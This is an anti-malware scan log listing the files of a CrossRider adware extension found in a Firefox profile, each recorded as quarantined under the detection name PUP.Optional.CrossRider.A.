PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome.manifest, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\install.rdf, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\3a198c50364e5de2a7b2256a2a71b8a2.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\4560a041a18e5c805686aca2fbbf7fac.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\aa62f988d870591179a338ca156cdc15.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\background.html, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\browser.xul, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\d3f3b4ca28206b48d6a5676ba7ba0c10.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\dialog.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\ef029b9a7e24e1a38853d7e5cf38c43b.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\fa2c47838609abcf29f7cdc8d7b8564c.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\ffCoreFilesIndex.txt, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\options.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\options.xul, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\search_dialog.xul, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\775b907e74651ad97a762623558b5cab.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\0c35837f9a11ea63529cc80cee467197.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\11fe0e663f6fb46289354ddc3fbefbd0.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\219bf4e6abfc1d5d6225552064590680.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\24e8e8f96bde5769fc6fca85d218a808.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\277c5ae40aecc6034a98d083cd558fc2.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\379326b295af3787ab8dfc2f0d5ee7c8.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\4423f19478213ffdfb956f0806330e92.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\4d9663a851b96485807749e976f70ef5.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\8c5f775b0beefb8ee4bf49ac7c7f742c.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\9765f2fc44bc0ea593d57f48c482d053.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\b81ef4f7ddb1fae1efda5bb85912ba27.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\be92fe0bb2acf264dd48214a61c22ce4.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\dbe5dedc6afbdc4734c2634e774a9516.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\ff1376e0d31ad66e9ec20defbf442981.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\d30b8adc9983626b8df7e160b37ab0c2.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\152c606d278fe66645f007ac2ec8ebdb.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\30c8b8ffbca4cefb5594c643a948742d.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\46ec2a4c74fe0461a3a60604984b4704.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\57d56ec60f4db1fa15955737bea73010.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\645f7bd0b4191d57dbe3eb8c9c4743fa.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\647bc88cb26ca6bedc974d074d4c54a5.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\92ff82a28e0b7b5fa9498a4ac36cf0ea.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\9ec430247724ff1f8abb1c685d0f3e41.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\aa76783cbe26f72d0989ebb7f1458af5.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\ab92aafe090eea44afe635c843530762.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\b6288df75deb1a1e0da423c8989a680f.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\bd1fddb8e7c2c7233e86af8174c0c640.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\bf7c7a62f0a464f3a46e339f5ec099c6.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\db23ddb634b535c06fb73c202c288b4d.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\de1752a9b55f28f2979e43867ea3876b.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\df7209e025c9077312341da96af47f94.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\f123638ad581430dfdc3fe9b855494ba.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\f53e02dbfad465bc508ed33e95917081.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\fcaf309745579a3dedb0cc1a8ebfd8a9.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\installer.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\defaults\preferences\prefs.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\manifest.xml, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins.json, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\1.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\102.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\123.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\13.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\14.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\16.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\17.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\177.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\180.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\182.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\183.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\192.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\195.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\207.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\21.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\22.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\220.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\221.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\223.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\242.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\244.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\246.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\259.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\260.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\263.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\268.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\273.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\28.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\281.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\284.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\4.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\47.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\64.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\7.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\78.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\91.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\93.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\98.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\userCode\background.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\userCode\extension.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\locale\en-US\translations.dtd, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\button1.png, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\button2.png, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\button3.png, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\button4.png, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\button5.png, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\crossrider_statusbar.png, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\icon128.png, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\icon16.png, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\icon24.png, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\icon48.png, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\panelarrow-up.png, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\popup.html, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
